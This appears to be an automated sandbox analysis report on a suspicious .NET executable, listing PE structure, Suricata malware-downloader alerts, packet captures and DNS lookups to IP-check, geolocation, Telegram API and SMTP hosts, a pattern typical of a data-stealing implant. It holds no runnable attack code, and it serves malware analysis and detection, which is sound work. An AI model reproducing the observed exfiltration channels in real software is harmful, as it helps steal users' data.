add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbf0ec	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc0000	0x364	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbd144	0xbd200	2fa4c2a6159a986c77b4835471e1aeec	False	0.9061209104428288	data	7.779225466224072	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc0000	0x364	0x400	bdda334372afdee3c5ecabe8a8a8729c	False	0.365234375	data	2.752045168177255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc2000	0xc	0x200	bc703825e4cc9853dd63a54e61ace295	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xc0058	0x308	data			0.44458762886597936

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-08T15:10:20.736990+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49737	193.122.130.0	80	TCP
2024-10-08T15:10:21.752732+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49737	193.122.130.0	80	TCP
2024-10-08T15:10:22.337547+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49761	188.114.96.3	443	TCP
2024-10-08T15:10:22.861976+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49765	193.122.130.0	80	TCP
2024-10-08T15:10:23.435351+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49769	188.114.96.3	443	TCP
2024-10-08T15:10:32.163088+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49831	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 15:10:17.919924021 CEST	49737	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:17.924979925 CEST	80	49737	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:17.925057888 CEST	49737	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:17.925327063 CEST	49737	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:17.930288076 CEST	80	49737	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:20.556535959 CEST	80	49737	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:20.556983948 CEST	80	49737	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:20.557005882 CEST	80	49737	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:20.557048082 CEST	49737	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:20.557100058 CEST	49737	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:20.589606047 CEST	49737	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:20.594814062 CEST	80	49737	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:20.693608999 CEST	80	49737	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:20.736989975 CEST	49737	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:20.785516024 CEST	49752	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:20.785553932 CEST	443	49752	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:20.785628080 CEST	49752	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:20.825026035 CEST	49752	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:20.825042963 CEST	443	49752	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:21.307502031 CEST	443	49752	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:21.307631969 CEST	49752	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:21.318243027 CEST	49752	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:21.318264008 CEST	443	49752	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:21.318622112 CEST	443	49752	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:21.361999035 CEST	49752	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:21.428895950 CEST	49752	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:21.471409082 CEST	443	49752	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:21.559928894 CEST	443	49752	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:21.560033083 CEST	443	49752	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:21.560077906 CEST	49752	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:21.589440107 CEST	49752	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:21.593852997 CEST	49737	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:21.598620892 CEST	80	49737	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:21.697854996 CEST	80	49737	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:21.700737000 CEST	49761	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:21.700773001 CEST	443	49761	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:21.700843096 CEST	49761	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:21.701208115 CEST	49761	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:21.701221943 CEST	443	49761	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:21.752732038 CEST	49737	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:22.180902958 CEST	443	49761	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:22.186881065 CEST	49761	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:22.186893940 CEST	443	49761	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:22.337570906 CEST	443	49761	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:22.337671041 CEST	443	49761	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:22.337762117 CEST	49761	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:22.338675022 CEST	49761	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:22.342922926 CEST	49737	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:22.343899012 CEST	49765	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:22.348457098 CEST	80	49737	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:22.348594904 CEST	49737	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:22.348965883 CEST	80	49765	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:22.349092960 CEST	49765	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:22.349164963 CEST	49765	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:22.354020119 CEST	80	49765	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:22.813498020 CEST	80	49765	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:22.827013016 CEST	49769	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:22.827050924 CEST	443	49769	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:22.827393055 CEST	49769	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:22.827908039 CEST	49769	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:22.827920914 CEST	443	49769	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:22.861975908 CEST	49765	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:23.296911001 CEST	443	49769	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:23.298916101 CEST	49769	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:23.298937082 CEST	443	49769	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:23.435359001 CEST	443	49769	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:23.435463905 CEST	443	49769	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:23.435518026 CEST	49769	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:23.436283112 CEST	49769	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:23.441582918 CEST	49774	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:23.446579933 CEST	80	49774	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:23.446659088 CEST	49774	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:23.446795940 CEST	49774	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:23.451694965 CEST	80	49774	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:24.944582939 CEST	80	49774	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:24.946276903 CEST	49784	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:24.946322918 CEST	443	49784	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:24.946451902 CEST	49784	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:24.946877003 CEST	49784	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:24.946891069 CEST	443	49784	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:24.987006903 CEST	49774	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:25.438393116 CEST	443	49784	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:25.443425894 CEST	49784	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:25.443449974 CEST	443	49784	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:25.617048025 CEST	443	49784	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:25.617290974 CEST	443	49784	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:25.617666006 CEST	49784	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:25.618393898 CEST	49784	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:25.628616095 CEST	49774	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:25.646193981 CEST	49789	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:25.940124989 CEST	49774	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:26.549527884 CEST	49774	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:26.658863068 CEST	49789	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:26.680949926 CEST	80	49789	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:26.680962086 CEST	80	49774	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:26.680969954 CEST	80	49774	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:26.681013107 CEST	80	49789	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:26.681072950 CEST	49789	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:26.681096077 CEST	49789	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:26.681225061 CEST	80	49774	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:26.681273937 CEST	49789	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:26.681277990 CEST	49774	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:26.687836885 CEST	80	49789	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:27.142234087 CEST	80	49789	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:27.144013882 CEST	49795	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:27.144073963 CEST	443	49795	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:27.144172907 CEST	49795	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:27.144498110 CEST	49795	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:27.144515991 CEST	443	49795	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:27.190191984 CEST	49789	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:27.624716997 CEST	443	49795	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:27.626564026 CEST	49795	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:27.626589060 CEST	443	49795	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:27.780744076 CEST	443	49795	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:27.780844927 CEST	443	49795	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:27.780913115 CEST	49795	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:27.781480074 CEST	49795	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:27.785340071 CEST	49789	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:27.786765099 CEST	49801	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:27.790950060 CEST	80	49789	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:27.791047096 CEST	49789	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:27.791722059 CEST	80	49801	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:27.791800976 CEST	49801	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:27.791939020 CEST	49801	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:27.796896935 CEST	80	49801	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:28.267467022 CEST	80	49801	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:28.269057989 CEST	49803	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:28.269068003 CEST	443	49803	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:28.269150019 CEST	49803	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:28.269397020 CEST	49803	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:28.269403934 CEST	443	49803	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:28.315150976 CEST	49801	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:28.727138042 CEST	443	49803	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:28.728998899 CEST	49803	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:28.729062080 CEST	443	49803	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:28.872194052 CEST	443	49803	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:28.872296095 CEST	443	49803	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:28.872411013 CEST	49803	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:28.873317957 CEST	49803	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:28.930773020 CEST	49801	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:28.932457924 CEST	49808	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:28.936047077 CEST	80	49801	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:28.936108112 CEST	49801	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:28.937333107 CEST	80	49808	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:28.937419891 CEST	49808	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:28.937613964 CEST	49808	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:28.942585945 CEST	80	49808	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:29.397955894 CEST	80	49808	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:29.399715900 CEST	49812	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:29.399772882 CEST	443	49812	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:29.399878979 CEST	49812	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:29.400171995 CEST	49812	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:29.400190115 CEST	443	49812	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:29.440156937 CEST	49808	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:29.869188070 CEST	443	49812	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:29.871037960 CEST	49812	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:29.871068001 CEST	443	49812	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:29.998876095 CEST	443	49812	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:29.998979092 CEST	443	49812	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:29.999042034 CEST	49812	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:29.999609947 CEST	49812	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:30.003299952 CEST	49808	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:30.004601955 CEST	49816	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:30.008743048 CEST	80	49808	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:30.008822918 CEST	49808	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:30.009464025 CEST	80	49816	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:30.009545088 CEST	49816	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:30.009635925 CEST	49816	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:30.014746904 CEST	80	49816	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:30.488385916 CEST	80	49816	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:30.490056992 CEST	49821	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:30.490091085 CEST	443	49821	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:30.490194082 CEST	49821	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:30.490492105 CEST	49821	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:30.490504026 CEST	443	49821	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:30.533860922 CEST	49816	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:30.950031042 CEST	443	49821	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:30.952866077 CEST	49821	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:30.952897072 CEST	443	49821	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:31.087816954 CEST	443	49821	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:31.087922096 CEST	443	49821	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:31.088011980 CEST	49821	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:31.088541031 CEST	49821	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:31.092031002 CEST	49816	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:31.092669964 CEST	49828	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:31.097417116 CEST	80	49816	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:31.097500086 CEST	49816	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:31.097645044 CEST	80	49828	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:31.097719908 CEST	49828	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:31.097845078 CEST	49828	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:31.103023052 CEST	80	49828	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:31.552058935 CEST	80	49828	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:31.553697109 CEST	49831	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:31.553731918 CEST	443	49831	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:31.553801060 CEST	49831	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:31.554191113 CEST	49831	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:31.554202080 CEST	443	49831	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:31.596373081 CEST	49828	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:32.015624046 CEST	443	49831	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:32.017699003 CEST	49831	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:32.017726898 CEST	443	49831	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:32.163235903 CEST	443	49831	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:32.163562059 CEST	443	49831	188.114.96.3	192.168.2.6
Oct 8, 2024 15:10:32.163618088 CEST	49831	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:32.163984060 CEST	49831	443	192.168.2.6	188.114.96.3
Oct 8, 2024 15:10:32.180023909 CEST	49828	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:32.185401917 CEST	80	49828	193.122.130.0	192.168.2.6
Oct 8, 2024 15:10:32.185461998 CEST	49828	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:32.188738108 CEST	49838	443	192.168.2.6	149.154.167.220
Oct 8, 2024 15:10:32.188772917 CEST	443	49838	149.154.167.220	192.168.2.6
Oct 8, 2024 15:10:32.188838959 CEST	49838	443	192.168.2.6	149.154.167.220
Oct 8, 2024 15:10:32.189455032 CEST	49838	443	192.168.2.6	149.154.167.220
Oct 8, 2024 15:10:32.189464092 CEST	443	49838	149.154.167.220	192.168.2.6
Oct 8, 2024 15:10:32.834947109 CEST	443	49838	149.154.167.220	192.168.2.6
Oct 8, 2024 15:10:32.835416079 CEST	49838	443	192.168.2.6	149.154.167.220
Oct 8, 2024 15:10:32.837341070 CEST	49838	443	192.168.2.6	149.154.167.220
Oct 8, 2024 15:10:32.837348938 CEST	443	49838	149.154.167.220	192.168.2.6
Oct 8, 2024 15:10:32.837585926 CEST	443	49838	149.154.167.220	192.168.2.6
Oct 8, 2024 15:10:32.839401960 CEST	49838	443	192.168.2.6	149.154.167.220
Oct 8, 2024 15:10:32.887403965 CEST	443	49838	149.154.167.220	192.168.2.6
Oct 8, 2024 15:10:33.089235067 CEST	443	49838	149.154.167.220	192.168.2.6
Oct 8, 2024 15:10:33.089303017 CEST	443	49838	149.154.167.220	192.168.2.6
Oct 8, 2024 15:10:33.089540005 CEST	49838	443	192.168.2.6	149.154.167.220
Oct 8, 2024 15:10:33.097348928 CEST	49838	443	192.168.2.6	149.154.167.220
Oct 8, 2024 15:10:38.287677050 CEST	49765	80	192.168.2.6	193.122.130.0
Oct 8, 2024 15:10:38.470689058 CEST	49875	587	192.168.2.6	208.91.199.223
Oct 8, 2024 15:10:38.475651979 CEST	587	49875	208.91.199.223	192.168.2.6
Oct 8, 2024 15:10:38.475843906 CEST	49875	587	192.168.2.6	208.91.199.223
Oct 8, 2024 15:10:39.161602974 CEST	587	49875	208.91.199.223	192.168.2.6
Oct 8, 2024 15:10:39.162200928 CEST	49875	587	192.168.2.6	208.91.199.223
Oct 8, 2024 15:10:39.167366028 CEST	587	49875	208.91.199.223	192.168.2.6
Oct 8, 2024 15:10:39.316873074 CEST	587	49875	208.91.199.223	192.168.2.6
Oct 8, 2024 15:10:39.318073988 CEST	49875	587	192.168.2.6	208.91.199.223
Oct 8, 2024 15:10:39.323050022 CEST	587	49875	208.91.199.223	192.168.2.6
Oct 8, 2024 15:10:39.475977898 CEST	587	49875	208.91.199.223	192.168.2.6
Oct 8, 2024 15:10:39.476366997 CEST	49875	587	192.168.2.6	208.91.199.223
Oct 8, 2024 15:10:39.481429100 CEST	587	49875	208.91.199.223	192.168.2.6
Oct 8, 2024 15:10:39.638111115 CEST	587	49875	208.91.199.223	192.168.2.6
Oct 8, 2024 15:10:39.638370991 CEST	49875	587	192.168.2.6	208.91.199.223
Oct 8, 2024 15:10:39.643490076 CEST	587	49875	208.91.199.223	192.168.2.6
Oct 8, 2024 15:10:39.795197964 CEST	587	49875	208.91.199.223	192.168.2.6
Oct 8, 2024 15:10:39.795408010 CEST	49875	587	192.168.2.6	208.91.199.223
Oct 8, 2024 15:10:39.800461054 CEST	587	49875	208.91.199.223	192.168.2.6
Oct 8, 2024 15:10:39.982266903 CEST	587	49875	208.91.199.223	192.168.2.6
Oct 8, 2024 15:10:39.986442089 CEST	49875	587	192.168.2.6	208.91.199.223
Oct 8, 2024 15:10:39.992214918 CEST	587	49875	208.91.199.223	192.168.2.6
Oct 8, 2024 15:10:39.992264986 CEST	49875	587	192.168.2.6	208.91.199.223

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 15:10:17.906429052 CEST	58755	53	192.168.2.6	1.1.1.1
Oct 8, 2024 15:10:17.914171934 CEST	53	58755	1.1.1.1	192.168.2.6
Oct 8, 2024 15:10:20.776580095 CEST	51157	53	192.168.2.6	1.1.1.1
Oct 8, 2024 15:10:20.784600019 CEST	53	51157	1.1.1.1	192.168.2.6
Oct 8, 2024 15:10:22.814915895 CEST	61509	53	192.168.2.6	1.1.1.1
Oct 8, 2024 15:10:22.826201916 CEST	53	61509	1.1.1.1	192.168.2.6
Oct 8, 2024 15:10:32.180744886 CEST	63611	53	192.168.2.6	1.1.1.1
Oct 8, 2024 15:10:32.188071012 CEST	53	63611	1.1.1.1	192.168.2.6
Oct 8, 2024 15:10:38.460053921 CEST	49871	53	192.168.2.6	1.1.1.1
Oct 8, 2024 15:10:38.469801903 CEST	53	49871	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 8, 2024 15:10:17.906429052 CEST	192.168.2.6	1.1.1.1	0x5f09	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:20.776580095 CEST	192.168.2.6	1.1.1.1	0x3fd1	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:22.814915895 CEST	192.168.2.6	1.1.1.1	0x5dd8	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:32.180744886 CEST	192.168.2.6	1.1.1.1	0x6a93	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:38.460053921 CEST	192.168.2.6	1.1.1.1	0xe928	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 8, 2024 15:10:12.957684040 CEST	1.1.1.1	192.168.2.6	0xcaae	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 8, 2024 15:10:12.957684040 CEST	1.1.1.1	192.168.2.6	0xcaae	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:17.914171934 CEST	1.1.1.1	192.168.2.6	0x5f09	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 8, 2024 15:10:17.914171934 CEST	1.1.1.1	192.168.2.6	0x5f09	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:17.914171934 CEST	1.1.1.1	192.168.2.6	0x5f09	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:17.914171934 CEST	1.1.1.1	192.168.2.6	0x5f09	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
